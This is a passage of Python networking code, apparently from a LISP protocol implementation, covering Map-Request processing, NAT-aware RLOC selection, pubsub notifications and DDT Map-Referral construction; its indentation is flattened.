eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and rtr in lisp_rtr_list or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
# This can also be true for IPv6 RLOCs. So include them.
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_ipv6()): rloc_set.append(rloc_entry)
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return(pubsub)
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, rloc_records,
registered_eid, site):
for peid in lisp_pubsub_cache:
for pubsub in list(lisp_pubsub_cache[peid].values()):
e = pubsub.eid_prefix
if (e.is_more_specific(registered_eid) == False): continue
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(peid, False), nonce))
#
# Do not use memory from EID-record of Map-Register since we are
# over-writing EID for Map-Notify message.
#
pubsub_record = copy.deepcopy(eid_record)
pubsub_record.eid.copy_address(e)
pubsub_record = pubsub_record.encode() + rloc_records
lisp_build_map_notify(lisp_sockets, pubsub_record, [peid], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
pubsub = lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl,
xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
pubsub.map_notify_count += 1
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and site_eid.policy in lisp_policies):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# When replying to a subscribe-request, return target EID and not
# maybe shorter matched EID-prefix regitered.
#
if (pubsub):
reply_eid = eid
reply_group = group
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint(("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs").format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
